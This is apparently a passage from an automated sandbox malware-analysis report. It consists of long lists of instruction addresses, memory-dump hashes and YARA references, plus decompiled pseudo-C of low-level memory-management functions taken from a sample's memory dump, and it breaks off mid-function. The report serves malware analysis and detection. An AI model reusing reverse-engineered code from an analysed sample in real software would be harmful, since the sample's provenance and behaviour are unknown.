                                                                                                        0x00b2b2fc
                                                                                                        0x00b2b2fc
                                                                                                        0x00b2b302
                                                                                                        0x00b2b33b
                                                                                                        0x00b2b341
                                                                                                        0x00000000
                                                                                                        0x00b2b304
                                                                                                        0x00b2b304
                                                                                                        0x00b2b319
                                                                                                        0x00b2b31e
                                                                                                        0x00b2b324
                                                                                                        0x00b2b326
                                                                                                        0x00b2b332
                                                                                                        0x00b2b347
                                                                                                        0x00b2b34c
                                                                                                        0x00b2b351
                                                                                                        0x00b2b35a
                                                                                                        0x00000000
                                                                                                        0x00b2b328
                                                                                                        0x00b2b328
                                                                                                        0x00000000
                                                                                                        0x00b2b328
                                                                                                        0x00b2b326
                                                                                                        0x00add658
                                                                                                        0x00add658
                                                                                                        0x00add65b
                                                                                                        0x00add665
                                                                                                        0x00000000
                                                                                                        0x00add66b
                                                                                                        0x00add66b
                                                                                                        0x00add66b
                                                                                                        0x00add66b
                                                                                                        0x00add66d
                                                                                                        0x00add672
                                                                                                        0x00add67a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00add680
                                                                                                        0x00add686
                                                                                                        0x00add8ce
                                                                                                        0x00add8d4
                                                                                                        0x00add8dd
                                                                                                        0x00add8e0
                                                                                                        0x00add68c
                                                                                                        0x00add691
                                                                                                        0x00add69d
                                                                                                        0x00add6a2
                                                                                                        0x00add6a7
                                                                                                        0x00add6b0
                                                                                                        0x00add6b5
                                                                                                        0x00add6e0
                                                                                                        0x00add6b7
                                                                                                        0x00add6b7
                                                                                                        0x00add6b9
                                                                                                        0x00add6b9
                                                                                                        0x00add6bb
                                                                                                        0x00add6bd
                                                                                                        0x00add6ce
                                                                                                        0x00add6d0
                                                                                                        0x00add6d2
                                                                                                        0x00b2b363
                                                                                                        0x00b2b365
                                                                                                        0x00000000
                                                                                                        0x00b2b36b
                                                                                                        0x00000000
                                                                                                        0x00b2b36b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00add6bf
                                                                                                        0x00add6bf
                                                                                                        0x00add6e5
                                                                                                        0x00add6e7
                                                                                                        0x00add6e9
                                                                                                        0x00add6ec
                                                                                                        0x00add6ec
                                                                                                        0x00add6ef
                                                                                                        0x00add6f5
                                                                                                        0x00add6f9
                                                                                                        0x00add6fb
                                                                                                        0x00add6fd
                                                                                                        0x00add701
                                                                                                        0x00add703
                                                                                                        0x00add70a
                                                                                                        0x00add70a
                                                                                                        0x00add701
                                                                                                        0x00add710
                                                                                                        0x00add710
                                                                                                        0x00add6c1
                                                                                                        0x00add6c1
                                                                                                        0x00add6c6
                                                                                                        0x00b2b36d
                                                                                                        0x00b2b36f
                                                                                                        0x00000000
                                                                                                        0x00b2b375
                                                                                                        0x00b2b375
                                                                                                        0x00b2b375
                                                                                                        0x00000000
                                                                                                        0x00b2b375
                                                                                                        0x00000000
                                                                                                        0x00add6cc
                                                                                                        0x00add6d8
                                                                                                        0x00add6d8
                                                                                                        0x00add6d8
                                                                                                        0x00000000
                                                                                                        0x00add6c6
                                                                                                        0x00add6bf
                                                                                                        0x00000000
                                                                                                        0x00add6da
                                                                                                        0x00add6da
                                                                                                        0x00add716
                                                                                                        0x00add71b
                                                                                                        0x00add720
                                                                                                        0x00add726
                                                                                                        0x00add726
                                                                                                        0x00add72d
                                                                                                        0x00000000
                                                                                                        0x00add733
                                                                                                        0x00add739
                                                                                                        0x00add742
                                                                                                        0x00add750
                                                                                                        0x00add758
                                                                                                        0x00add764
                                                                                                        0x00add776
                                                                                                        0x00add77a
                                                                                                        0x00add783
                                                                                                        0x00add928
                                                                                                        0x00add92c
                                                                                                        0x00add93d
                                                                                                        0x00add944
                                                                                                        0x00add94f
                                                                                                        0x00add954
                                                                                                        0x00add956
                                                                                                        0x00add95f
                                                                                                        0x00add961
                                                                                                        0x00add973
                                                                                                        0x00add973
                                                                                                        0x00add956
                                                                                                        0x00add944
                                                                                                        0x00add92c
                                                                                                        0x00add78b
                                                                                                        0x00b2b394
                                                                                                        0x00add791
                                                                                                        0x00add798
                                                                                                        0x00b2b3a3
                                                                                                        0x00b2b3bb
                                                                                                        0x00b2b3bb
                                                                                                        0x00add7a5
                                                                                                        0x00add866
                                                                                                        0x00add870
                                                                                                        0x00add892
                                                                                                        0x00add898
                                                                                                        0x00add89e
                                                                                                        0x00add8a0
                                                                                                        0x00add8a6
                                                                                                        0x00add8ac
                                                                                                        0x00add8ae
                                                                                                        0x00add8b4
                                                                                                        0x00add8b4
                                                                                                        0x00add8ae
                                                                                                        0x00add7a5
                                                                                                        0x00add78b
                                                                                                        0x00add7b1
                                                                                                        0x00b2b3c5
                                                                                                        0x00b2b3c5
                                                                                                        0x00add7c3
                                                                                                        0x00add7ca
                                                                                                        0x00add7e5
                                                                                                        0x00add7eb
                                                                                                        0x00add8eb
                                                                                                        0x00add8ed
                                                                                                        0x00000000
                                                                                                        0x00add8f3
                                                                                                        0x00add8f3
                                                                                                        0x00add8f3
                                                                                                        0x00000000
                                                                                                        0x00add8ed
                                                                                                        0x00add7cc
                                                                                                        0x00add7cc
                                                                                                        0x00add7d2
                                                                                                        0x00000000
                                                                                                        0x00add7d4
                                                                                                        0x00add7d4
                                                                                                        0x00add7d7
                                                                                                        0x00add7df
                                                                                                        0x00b2b3d4
                                                                                                        0x00b2b3d9
                                                                                                        0x00b2b3dc
                                                                                                        0x00b2b3dc
                                                                                                        0x00b2b3df
                                                                                                        0x00b2b3e2
                                                                                                        0x00b2b468
                                                                                                        0x00b2b46d
                                                                                                        0x00b2b46f
                                                                                                        0x00b2b46f
                                                                                                        0x00b2b475
                                                                                                        0x00add8f8
                                                                                                        0x00add8f9
                                                                                                        0x00add8fd
                                                                                                        0x00b2b3e8
                                                                                                        0x00b2b3e8
                                                                                                        0x00b2b3eb
                                                                                                        0x00b2b3ed
                                                                                                        0x00000000
                                                                                                        0x00b2b3ef
                                                                                                        0x00b2b3ef
                                                                                                        0x00b2b3f1
                                                                                                        0x00b2b3f4
                                                                                                        0x00b2b3fe
                                                                                                        0x00b2b404
                                                                                                        0x00b2b409
                                                                                                        0x00b2b40e
                                                                                                        0x00b2b410
                                                                                                        0x00b2b410
                                                                                                        0x00b2b414
                                                                                                        0x00b2b414
                                                                                                        0x00b2b41b
                                                                                                        0x00b2b420
                                                                                                        0x00b2b423
                                                                                                        0x00b2b425
                                                                                                        0x00b2b427
                                                                                                        0x00b2b42a
                                                                                                        0x00b2b42d
                                                                                                        0x00b2b42d
                                                                                                        0x00b2b42a
                                                                                                        0x00b2b432
                                                                                                        0x00b2b436
                                                                                                        0x00b2b438
                                                                                                        0x00b2b43b
                                                                                                        0x00b2b43b
                                                                                                        0x00b2b449
                                                                                                        0x00b2b44e
                                                                                                        0x00b2b454
                                                                                                        0x00b2b458
                                                                                                        0x00b2b458
                                                                                                        0x00b2b45d
                                                                                                        0x00000000
                                                                                                        0x00b2b45d
                                                                                                        0x00b2b3ed
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00add7df
                                                                                                        0x00add7d2
                                                                                                        0x00add7ca
                                                                                                        0x00b2b37c
                                                                                                        0x00b2b37e
                                                                                                        0x00b2b385
                                                                                                        0x00b2b38a
                                                                                                        0x00000000
                                                                                                        0x00b2b38a
                                                                                                        0x00add742
                                                                                                        0x00add7f1
                                                                                                        0x00add7f8
                                                                                                        0x00b2b49b
                                                                                                        0x00b2b49b
                                                                                                        0x00add800
                                                                                                        0x00add837
                                                                                                        0x00add843
                                                                                                        0x00add845
                                                                                                        0x00add847
                                                                                                        0x00add84a
                                                                                                        0x00add84b
                                                                                                        0x00add84e
                                                                                                        0x00add857
                                                                                                        0x00add818
                                                                                                        0x00add824
                                                                                                        0x00add831
                                                                                                        0x00b2b4a5
                                                                                                        0x00b2b4ab
                                                                                                        0x00b2b4b3
                                                                                                        0x00b2b4b8
                                                                                                        0x00b2b4bb
                                                                                                        0x00000000
                                                                                                        0x00b2b4c1
                                                                                                        0x00b2b4c1
                                                                                                        0x00b2b4c8
                                                                                                        0x00000000
                                                                                                        0x00b2b4ce
                                                                                                        0x00b2b4d4
                                                                                                        0x00b2b4e1
                                                                                                        0x00b2b4e3
                                                                                                        0x00b2b4e5
                                                                                                        0x00000000
                                                                                                        0x00b2b4eb
                                                                                                        0x00b2b4f0
                                                                                                        0x00b2b4f2
                                                                                                        0x00addac9
                                                                                                        0x00addacc
                                                                                                        0x00addacf
                                                                                                        0x00addad1
                                                                                                        0x00addd78
                                                                                                        0x00addd78
                                                                                                        0x00addcf2
                                                                                                        0x00000000
                                                                                                        0x00addad7
                                                                                                        0x00addad9
                                                                                                        0x00addadb
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00addae1
                                                                                                        0x00addae1
                                                                                                        0x00addae4
                                                                                                        0x00addae6
                                                                                                        0x00b2b4f9
                                                                                                        0x00b2b4f9
                                                                                                        0x00b2b500
                                                                                                        0x00addaec
                                                                                                        0x00addaec
                                                                                                        0x00addaf5
                                                                                                        0x00addaf8
                                                                                                        0x00addafb
                                                                                                        0x00addb03
                                                                                                        0x00addb11
                                                                                                        0x00addb16
                                                                                                        0x00addb19
                                                                                                        0x00addb1b
                                                                                                        0x00b2b52c
                                                                                                        0x00b2b531
                                                                                                        0x00b2b534
                                                                                                        0x00addb21
                                                                                                        0x00addb21
                                                                                                        0x00addb24
                                                                                                        0x00addcd9
                                                                                                        0x00addce2
                                                                                                        0x00addce5
                                                                                                        0x00addd6a
                                                                                                        0x00addd6d
                                                                                                        0x00000000
                                                                                                        0x00addd73
                                                                                                        0x00b2b51a
                                                                                                        0x00b2b51c
                                                                                                        0x00b2b51f
                                                                                                        0x00b2b524
                                                                                                        0x00000000
                                                                                                        0x00b2b524
                                                                                                        0x00addce7
                                                                                                        0x00addce7
                                                                                                        0x00addce7
                                                                                                        0x00000000
                                                                                                        0x00addce7
                                                                                                        0x00000000
                                                                                                        0x00addb2a
                                                                                                        0x00addb2c
                                                                                                        0x00addb31
                                                                                                        0x00addb33
                                                                                                        0x00addb36
                                                                                                        0x00addb39
                                                                                                        0x00addb3b
                                                                                                        0x00addb66
                                                                                                        0x00addb66
                                                                                                        0x00addb3d
                                                                                                        0x00addb3d
                                                                                                        0x00addb3e
                                                                                                        0x00addb46
                                                                                                        0x00addb47
                                                                                                        0x00addb49
                                                                                                        0x00addb4c
                                                                                                        0x00addb53
                                                                                                        0x00addb55
                                                                                                        0x00addb58
                                                                                                        0x00addb5a
                                                                                                        0x00b2b50a
                                                                                                        0x00b2b50f
                                                                                                        0x00b2b512
                                                                                                        0x00addb60
                                                                                                        0x00addb60
                                                                                                        0x00addb63
                                                                                                        0x00addb63
                                                                                                        0x00000000
                                                                                                        0x00addb63
                                                                                                        0x00addb5a
                                                                                                        0x00addb3b
                                                                                                        0x00addb24
                                                                                                        0x00addb69
                                                                                                        0x00addb69
                                                                                                        0x00addb6c
                                                                                                        0x00addb6f
                                                                                                        0x00addb74
                                                                                                        0x00b2b557
                                                                                                        0x00b2b557
                                                                                                        0x00b2b55e
                                                                                                        0x00addb7a
                                                                                                        0x00addb7c
                                                                                                        0x00addb7f
                                                                                                        0x00addb82
                                                                                                        0x00addb85
                                                                                                        0x00000000
                                                                                                        0x00addb8b
                                                                                                        0x00addb8b
                                                                                                        0x00addb8d
                                                                                                        0x00addb9b
                                                                                                        0x00addb9b
                                                                                                        0x00addb9d
                                                                                                        0x00addba0
                                                                                                        0x00addba2
                                                                                                        0x00addba4
                                                                                                        0x00addba7
                                                                                                        0x00addba9
                                                                                                        0x00addbae
                                                                                                        0x00addbae
                                                                                                        0x00addbb1
                                                                                                        0x00addbb4
                                                                                                        0x00addbb4
                                                                                                        0x00addbb7
                                                                                                        0x00addbba
                                                                                                        0x00addcd2
                                                                                                        0x00addcd4
                                                                                                        0x00000000
                                                                                                        0x00addbc0
                                                                                                        0x00addbc0
                                                                                                        0x00addbd2
                                                                                                        0x00addbd7
                                                                                                        0x00addbda
                                                                                                        0x00addbdd
                                                                                                        0x00addbdf
                                                                                                        0x00000000
                                                                                                        0x00addbe5
                                                                                                        0x00addbe5
                                                                                                        0x00addbee
                                                                                                        0x00addbf1
                                                                                                        0x00b2b541
                                                                                                        0x00b2b544
                                                                                                        0x00000000
                                                                                                        0x00b2b546
                                                                                                        0x00b2b546
                                                                                                        0x00000000
                                                                                                        0x00b2b546
                                                                                                        0x00addbf7
                                                                                                        0x00addbf7
                                                                                                        0x00addbfd
                                                                                                        0x00addbfd
                                                                                                        0x00addbff
                                                                                                        0x00addc0b
                                                                                                        0x00addc15
                                                                                                        0x00addc1b
                                                                                                        0x00addc1d
                                                                                                        0x00addc21
                                                                                                        0x00addc21
                                                                                                        0x00addc23
                                                                                                        0x00addc23
                                                                                                        0x00addc26
                                                                                                        0x00addc29
                                                                                                        0x00addc2b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00addc31
                                                                                                        0x00addc34
                                                                                                        0x00addc36
                                                                                                        0x00addcbf
                                                                                                        0x00addcbf
                                                                                                        0x00addcc2
                                                                                                        0x00000000
                                                                                                        0x00addc3c
                                                                                                        0x00addc41
                                                                                                        0x00addc43
                                                                                                        0x00000000
                                                                                                        0x00addc45
                                                                                                        0x00addc45
                                                                                                        0x00addc47
                                                                                                        0x00000000
                                                                                                        0x00addc4d
                                                                                                        0x00addc4d
                                                                                                        0x00addc50
                                                                                                        0x00addc52
                                                                                                        0x00addc55
                                                                                                        0x00addcfa
                                                                                                        0x00addcfe
                                                                                                        0x00addd08
                                                                                                        0x00addd0a
                                                                                                        0x00addd0c
                                                                                                        0x00000000
                                                                                                        0x00addd12
                                                                                                        0x00addd15
                                                                                                        0x00addd2d
                                                                                                        0x00addd2f
                                                                                                        0x00addd32
                                                                                                        0x00addd35
                                                                                                        0x00000000
                                                                                                        0x00addd35
                                                                                                        0x00addc5b
                                                                                                        0x00addc5b
                                                                                                        0x00addc5e
                                                                                                        0x00addc61
                                                                                                        0x00addc64
                                                                                                        0x00addc67
                                                                                                        0x00addc67
                                                                                                        0x00addc6a
                                                                                                        0x00addc6c
                                                                                                        0x00addc8e
                                                                                                        0x00addc8e
                                                                                                        0x00addc91
                                                                                                        0x00addc93
                                                                                                        0x00addcce
                                                                                                        0x00addcce
                                                                                                        0x00addc95
                                                                                                        0x00addc9c
                                                                                                        0x00addc6e
                                                                                                        0x00addc72
                                                                                                        0x00addc75
                                                                                                        0x00addc77
                                                                                                        0x00addc79
                                                                                                        0x00b2b551
                                                                                                        0x00b2b551
                                                                                                        0x00000000
                                                                                                        0x00addc7f
                                                                                                        0x00addc7f
                                                                                                        0x00addc81
                                                                                                        0x00000000
                                                                                                        0x00addc83
                                                                                                        0x00addc86
                                                                                                        0x00addc88
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00addc88
                                                                                                        0x00addc81
                                                                                                        0x00addc79
                                                                                                        0x00addc6c
                                                                                                        0x00addc55
                                                                                                        0x00addc47
                                                                                                        0x00addc43
                                                                                                        0x00000000
                                                                                                        0x00addc36
                                                                                                        0x00addc23
                                                                                                        0x00000000
                                                                                                        0x00addbff
                                                                                                        0x00addbf1
                                                                                                        0x00addbdf
                                                                                                        0x00addb8f
                                                                                                        0x00addb92
                                                                                                        0x00addb95
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00addb95
                                                                                                        0x00addb8d
                                                                                                        0x00addb85
                                                                                                        0x00addb74
                                                                                                        0x00addc9f
                                                                                                        0x00addca2
                                                                                                        0x00addcb0
                                                                                                        0x00addcb0
                                                                                                        0x00addad1
                                                                                                        0x00b2b4e5
                                                                                                        0x00b2b4c8
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00add831
                                                                                                        0x00000000
                                                                                                        0x00add800
                                                                                                        0x00b2b47f
                                                                                                        0x00b2b485
                                                                                                        0x00000000
                                                                                                        0x00b2b485
                                                                                                        0x00add665
                                                                                                        0x00add652
                                                                                                        0x00000000

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (/g$8*g
                                                                                                        • API String ID: 0-88277161
                                                                                                        • Opcode ID: b4221a9d3e7753b145657699f0f43c9293209e387394ce068469cf5cd5172148
                                                                                                        • Instruction ID: cd68df0253063d628f6fef92c391628b3610cbe223f83b1dc80a1854af825c5e
                                                                                                        • Opcode Fuzzy Hash: b4221a9d3e7753b145657699f0f43c9293209e387394ce068469cf5cd5172148
                                                                                                        • Instruction Fuzzy Hash: 88E1A231A00369CFDB24DF28C994BA9B7B6BF45304F1441EAE90A97391DB74AD81CB51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B8E539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 60%
                                                                                                        			E00B8E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E00B8BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E00B8BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E00B8AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E00B09730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E00B8A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E00B8A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E00B09730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E00B8A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E00B8A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E00AE2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E00ADB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E00ADFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E00AE7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E00B7FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                                                                                        0x00b8e547
                                                                                                        0x00b8e549
                                                                                                        0x00b8e54f
                                                                                                        0x00b8e553
                                                                                                        0x00b8e557
                                                                                                        0x00b8e55a
                                                                                                        0x00b8e55c
                                                                                                        0x00b8e55f
                                                                                                        0x00b8e561
                                                                                                        0x00b8e567
                                                                                                        0x00b8e56b
                                                                                                        0x00b8e7e2
                                                                                                        0x00000000
                                                                                                        0x00b8e571
                                                                                                        0x00b8e575
                                                                                                        0x00b8e577
                                                                                                        0x00b8e57b
                                                                                                        0x00b8e57c
                                                                                                        0x00b8e57d
                                                                                                        0x00b8e57e
                                                                                                        0x00b8e57f
                                                                                                        0x00b8e588
                                                                                                        0x00b8e58f
                                                                                                        0x00b8e591
                                                                                                        0x00b8e592
                                                                                                        0x00b8e592
                                                                                                        0x00b8e596
                                                                                                        0x00b8e59e
                                                                                                        0x00b8e5a0
                                                                                                        0x00b8e5a6
                                                                                                        0x00b8e61d
                                                                                                        0x00b8e61d
                                                                                                        0x00b8e621
                                                                                                        0x00b8e623
                                                                                                        0x00b8e630
                                                                                                        0x00b8e630
                                                                                                        0x00b8e7e6
                                                                                                        0x00b8e7eb
                                                                                                        0x00b8e7ed
                                                                                                        0x00b8e7f4
                                                                                                        0x00b8e7fa
                                                                                                        0x00b8e7ff
                                                                                                        0x00b8e7ff
                                                                                                        0x00b8e80a
                                                                                                        0x00b8e812
                                                                                                        0x00b8e812
                                                                                                        0x00b8e5ab
                                                                                                        0x00b8e5b4
                                                                                                        0x00b8e5b9
                                                                                                        0x00b8e5be
                                                                                                        0x00b8e5c0
                                                                                                        0x00b8e5c2
                                                                                                        0x00b8e5c8
                                                                                                        0x00b8e5c9
                                                                                                        0x00b8e5cb
                                                                                                        0x00b8e5cc
                                                                                                        0x00b8e5d5
                                                                                                        0x00b8e5e4
                                                                                                        0x00b8e5f1
                                                                                                        0x00b8e5f8
                                                                                                        0x00b8e5f8
                                                                                                        0x00b8e5d5
                                                                                                        0x00b8e602
                                                                                                        0x00b8e616
                                                                                                        0x00b8e63d
                                                                                                        0x00b8e644
                                                                                                        0x00b8e64d
                                                                                                        0x00b8e652
                                                                                                        0x00b8e657
                                                                                                        0x00b8e659
                                                                                                        0x00b8e65b
                                                                                                        0x00b8e661
                                                                                                        0x00b8e662
                                                                                                        0x00b8e664
                                                                                                        0x00b8e665
                                                                                                        0x00b8e66e
                                                                                                        0x00b8e67d
                                                                                                        0x00b8e68a
                                                                                                        0x00b8e691
                                                                                                        0x00b8e691
                                                                                                        0x00b8e66e
                                                                                                        0x00b8e6b0
                                                                                                        0x00000000
                                                                                                        0x00b8e6b6
                                                                                                        0x00b8e6bd
                                                                                                        0x00b8e6c7
                                                                                                        0x00b8e6d7
                                                                                                        0x00b8e6d9
                                                                                                        0x00b8e6db
                                                                                                        0x00b8e6de
                                                                                                        0x00b8e6e3
                                                                                                        0x00b8e6f3
                                                                                                        0x00b8e6fc
                                                                                                        0x00b8e700
                                                                                                        0x00b8e700
                                                                                                        0x00b8e704
                                                                                                        0x00b8e70a
                                                                                                        0x00b8e70a
                                                                                                        0x00b8e713
                                                                                                        0x00b8e716
                                                                                                        0x00b8e719
                                                                                                        0x00b8e720
                                                                                                        0x00b8e761
                                                                                                        0x00b8e76b
                                                                                                        0x00b8e774
                                                                                                        0x00b8e77a
                                                                                                        0x00b8e77a
                                                                                                        0x00b8e78a
                                                                                                        0x00b8e791
                                                                                                        0x00b8e799
                                                                                                        0x00b8e79b
                                                                                                        0x00b8e79f
                                                                                                        0x00b8e7aa
                                                                                                        0x00b8e7c0
                                                                                                        0x00b8e7ac
                                                                                                        0x00b8e7b2
                                                                                                        0x00b8e7b9
                                                                                                        0x00b8e7b9
                                                                                                        0x00b8e7c7
                                                                                                        0x00b8e806
                                                                                                        0x00000000
                                                                                                        0x00b8e7c9
                                                                                                        0x00b8e7d1
                                                                                                        0x00b8e7d8
                                                                                                        0x00000000
                                                                                                        0x00b8e7d8
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b8e722
                                                                                                        0x00b8e72e
                                                                                                        0x00b8e748
                                                                                                        0x00b8e74c
                                                                                                        0x00b8e754
                                                                                                        0x00b8e756
                                                                                                        0x00b8e75c
                                                                                                        0x00b8e75c
                                                                                                        0x00000000
                                                                                                        0x00b8e75c
                                                                                                        0x00b8e758
                                                                                                        0x00b8e758
                                                                                                        0x00000000
                                                                                                        0x00b8e758
                                                                                                        0x00b8e750
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b8e752
                                                                                                        0x00000000
                                                                                                        0x00b8e752
                                                                                                        0x00b8e730
                                                                                                        0x00b8e735
                                                                                                        0x00b8e73d
                                                                                                        0x00b8e73f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b8e741
                                                                                                        0x00b8e741
                                                                                                        0x00000000
                                                                                                        0x00b8e741
                                                                                                        0x00b8e739
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b8e73b
                                                                                                        0x00000000
                                                                                                        0x00b8e73b
                                                                                                        0x00b8e722
                                                                                                        0x00b8e720
                                                                                                        0x00b8e6b0
                                                                                                        0x00b8e618
                                                                                                        0x00000000
                                                                                                        0x00b8e618

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: `$`
                                                                                                        • API String ID: 0-197956300
                                                                                                        • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                                        • Instruction ID: b196d28d982c9b87e1121ac707aaf39df3f5ddff28f0082a78086d0ba16e8b85
                                                                                                        • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                                        • Instruction Fuzzy Hash: 42919D352043429FE724EE25C941B2BB7E5FF84714F14896DF9A9CB2A1E774E804CB62
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B451BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 77%
                                                                                                        			E00B451BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0xba05f0);
				E00B1D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
